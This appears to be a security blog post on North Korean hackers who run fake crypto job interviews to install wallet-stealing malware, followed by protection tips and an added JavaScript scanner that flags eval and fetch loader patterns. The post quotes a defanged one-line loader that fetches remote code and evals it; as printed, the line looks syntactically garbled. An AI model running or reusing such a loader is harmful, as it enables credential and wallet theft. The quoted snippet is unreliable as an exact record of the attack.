Job hunting is stressful enough, but what if the “dream job” you applied for was actually a front for hackers? A North Korean cyber-espionage group, known as “Contagious Interview” (a subgroup of the infamous Lazarus Group), has been setting up fake cryptocurrency consulting firms to deliver malware to unsuspecting job seekers.
These hackers have created three convincing-looking companies (BlockNovas LLC, Angeloper Agency, and SoftGlide LLC), complete with professional websites, LinkedIn profiles, and even fake employee testimonials. Their targets? Cryptocurrency developers, traders, and finance professionals lured by high-paying remote job offers.
But instead of a paycheck, victims get hit with BeaverTail, InvisibleFerret, and OtterCookie, three custom malware strains designed to steal crypto wallet credentials and browser data, and even grant hackers remote access to their computers.
How the Scam Works: A Fake Interview, a Real Infection
The scheme starts like any legitimate job hunt. Victims apply through platforms like Upwork, Freelancer, or crypto-specific job boards. After initial contact, they’re directed to the fake company’s website for an “interview process.”
The real trap comes during the “technical assessment” phase, where applicants are asked to:
- Record a video introduction
- Run a piece of code to “fix” camera permission errors
Here’s the malicious code they’re tricked into executing:
fetch(eval(decodeURIComponent('\'lianxinxiao[.]com:5000/tokenizer''))) .then(response => response.text()) .then(data => { eval(data); });
This seemingly harmless script fetches and runs BeaverTail, a JavaScript-based malware that then downloads InvisibleFerret, a Python backdoor. Once installed, the malware:
- Steals MetaMask, Coinbase, Phantom, and other crypto wallet credentials
- Logs keystrokes and browser activity
- Establishes persistence (even after reboots)
Fake Employees, AI-Generated Faces, and Convincing Lies
To make their fake companies seem real, the hackers:
✅ Use AI-generated profile pictures for fake “employees”
✅ Post fabricated work histories and client testimonials on LinkedIn
✅ Maintain professional-looking websites with SSL certificates
Security firm Silent Push uncovered the scam after analyzing unusual malware samples linked to domains like lianxinxiao[.]com. One victim reported their MetaMask wallet was drained shortly after running code from BlockNovas.
How to Protect Yourself from Job Scams
Since these attacks prey on job seekers’ trust, here’s how to stay safe:
✔ Verify the company: Check domains, employee profiles, and reviews across multiple sources.
✔ Never run code during interviews: Legitimate jobs won’t ask you to execute random scripts.
✔ Use a separate device for crypto: Keep wallets on a dedicated machine with no job-related activity.
✔ Enable 2FA everywhere: Especially on crypto wallets and email accounts.
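A static check along these lines can be run over any snippet handed to you in an “assessment” before it goes anywhere near a terminal or browser console. This is an added example, not code from the original post or from Silent Push; the rule ids, verdict labels and sample strings are assumptions made for illustration.

```javascript
// Added example: heuristic pre-run check for code handed over as an "assessment".
// Rule ids and verdict labels are this example's own choices, not a standard.
const RULES = [
  { id: 'dynamic-exec', re: /\b(?:eval|Function)\s*\(/,
    why: 'executes a string as code' },
  { id: 'decoded-exec',
    re: /\beval\s*\(\s*(?:decodeURIComponent|unescape|atob)\s*\(/,
    why: 'decodes a hidden string and executes it' },
  { id: 'network-fetch',
    re: /\b(?:fetch|axios\s*\.\s*get|https?\s*\.\s*get)\s*\(|\bXMLHttpRequest\b/,
    why: 'pulls content from a remote host' },
  { id: 'child-process', re: /\bchild_process\b|\b(?:execSync|spawn)\s*\(/,
    why: 'starts other programs' },
];

// Drop block comments so `eval/**/(x)` cannot slip past the patterns, then
// collapse whitespace. Line comments stay: stripping `//` would also eat the
// tail of any URL inside a string.
function normalise(source) {
  return source.replace(/\/\*[\s\S]*?\*\//g, '').replace(/\s+/g, ' ');
}

function scanSnippet(source) {
  const text = normalise(source);
  const hits = RULES.filter((r) => r.re.test(text))
    .map((r) => ({ id: r.id, why: r.why }));
  const ids = hits.map((h) => h.id);
  // The loader shape from the article: download text, then execute it.
  const remoteLoader = ids.includes('network-fetch') && ids.includes('dynamic-exec');
  const verdict = remoteLoader ? 'block' : hits.length ? 'review' : 'no-match';
  return { verdict, ids, hits };
}

// Constructed samples. LOADER has the same shape as the snippet quoted above
// but points at a reserved placeholder host.
const LOADER = "fetch('http://assessment.example.invalid/fix')" +
  ".then(r => r.text()).then(data => { eval/* fix camera */(data); });";
const DECODED = "eval(decodeURIComponent('%63%6f%6e%73%6f%6c%65'))";
const BENIGN = "navigator.mediaDevices.getUserMedia({ video: true })" +
  ".then(stream => { preview.srcObject = stream; });";

for (const [name, src] of Object.entries({ LOADER, DECODED, BENIGN })) {
  const { verdict, ids } = scanSnippet(src);
  console.log(`${name}: ${verdict} [${ids.join(', ')}]`);
}
```

A `no-match` verdict only means none of these four patterns appeared; it is a reason to keep reading the code, not a reason to run it.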
Final Thoughts: A Growing Threat
North Korean hackers have long used social engineering to fund their operations—whether through crypto heists, ransomware, or phishing. This latest tactic shows just how far they’ll go to exploit job seekers.
If a job offer seems too good to be true, it probably is. Always double-check before engaging in technical tests—your crypto wallet might depend on it.
Why This Matters
With remote work on the rise, job scams are becoming more sophisticated. Hackers are no longer just sending phishing emails; they’re building entire fake companies to trick victims. Staying informed is the best defense.